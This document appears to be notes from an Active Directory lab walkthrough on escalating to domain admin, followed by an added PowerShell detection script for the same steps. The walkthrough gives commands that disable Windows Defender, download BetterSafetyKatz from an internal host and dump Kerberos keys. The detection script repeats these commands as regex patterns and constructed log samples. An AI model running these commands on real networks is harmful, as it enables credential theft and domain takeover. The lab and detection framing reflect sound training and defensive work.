Enumerating Machines Where a Domain Admin Has a Session

Loading Invoke-SessionHunter Script

. .\Invoke-SessionHunter.ps1

Running The Script

Invoke-SessionHunter -Verbose

Compromising Machine and Escalating to Domain Admins

Enter-PSSession -ComputerName dcorp-ci

Disabling Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Transferring BetterSafetyKatz to the Machine

wget -Uri http://172.16.100.22/BetterSafetyKatz.exe -OutFile BetterSafetyKatz.exe

Now Dumping the Secrets

.\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"

The Secrets
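
A defender-side view of the steps above, as an added example that is not part of the original notes: it matches the commands from this walkthrough in PowerShell script block log text (event ID 4104) and reports hosts where Defender real-time monitoring was disabled and another rule fired shortly afterwards. It assumes script block logging is enabled; the rule names, function names and sample records are constructed for illustration.

```powershell
# Added example: patterns for the commands in this walkthrough, matched against
# script block log text (event ID 4104). Rule and function names are illustrative.
$Rules = [ordered]@{
    SessionHunting           = 'Invoke-SessionHunter'
    DefenderRealtimeDisabled = 'Set-MpPreference\s.*-DisableRealtimeMonitoring\s+(\$true|1)'
    ExecutableDownload       = '(wget|iwr|curl|Invoke-WebRequest)\s.*-OutFile\s+\S+\.exe'
    KerberosKeyDump          = 'sekurlsa::ekeys'
}

function Find-SuspiciousScriptBlock {
    param([Parameter(Mandatory)] [object[]] $Events)  # needs TimeCreated, Computer, ScriptBlockText
    foreach ($e in $Events) {
        foreach ($name in $Rules.Keys) {
            if ($e.ScriptBlockText -match $Rules[$name]) {   # -match is case-insensitive
                [pscustomobject]@{ TimeCreated = $e.TimeCreated; Computer = $e.Computer; Rule = $name }
            }
        }
    }
}

# Hosts where real-time monitoring was disabled and another rule fired within the window.
function Get-ChainedHost {
    param([object[]] $Hits, [int] $WindowMinutes = 30)
    foreach ($g in ($Hits | Group-Object Computer)) {
        $off = $g.Group | Where-Object { $_.Rule -eq 'DefenderRealtimeDisabled' } |
            Sort-Object TimeCreated | Select-Object -First 1
        if (-not $off) { continue }
        $limit = $off.TimeCreated.AddMinutes($WindowMinutes)
        $next = @($g.Group | Where-Object {
            $_.Rule -ne 'DefenderRealtimeDisabled' -and
            $_.TimeCreated -ge $off.TimeCreated -and $_.TimeCreated -le $limit })
        if ($next.Count) {
            [pscustomobject]@{ Computer = $g.Name; DisabledAt = $off.TimeCreated
                               FollowedBy = ($next.Rule | Select-Object -Unique) -join ', ' }
        }
    }
}

# Constructed sample records (not real log data); HOST-B is a benign control.
$t = Get-Date '2024-01-01T10:00:00'
$Sample = @(
    [pscustomobject]@{ TimeCreated = $t; Computer = 'dcorp-ci'; ScriptBlockText = 'Set-MpPreference -DisableRealtimeMonitoring $true' }
    [pscustomobject]@{ TimeCreated = $t.AddMinutes(2); Computer = 'dcorp-ci'; ScriptBlockText = 'wget -Uri http://172.16.100.22/BetterSafetyKatz.exe -OutFile BetterSafetyKatz.exe' }
    [pscustomobject]@{ TimeCreated = $t.AddMinutes(3); Computer = 'dcorp-ci'; ScriptBlockText = '.\BetterSafetyKatz.exe "sekurlsa::ekeys" "exit"' }
    [pscustomobject]@{ TimeCreated = $t; Computer = 'HOST-B'; ScriptBlockText = 'Get-MpPreference | Select-Object DisableRealtimeMonitoring' }
)
Get-ChainedHost -Hits (Find-SuspiciousScriptBlock -Events $Sample)
```

On a live host the input records can be built from `Get-WinEvent` against the `Microsoft-Windows-PowerShell/Operational` log filtered to ID 4104. Windows Defender separately records event ID 5001 in `Microsoft-Windows-Windows Defender/Operational` when real-time protection is disabled.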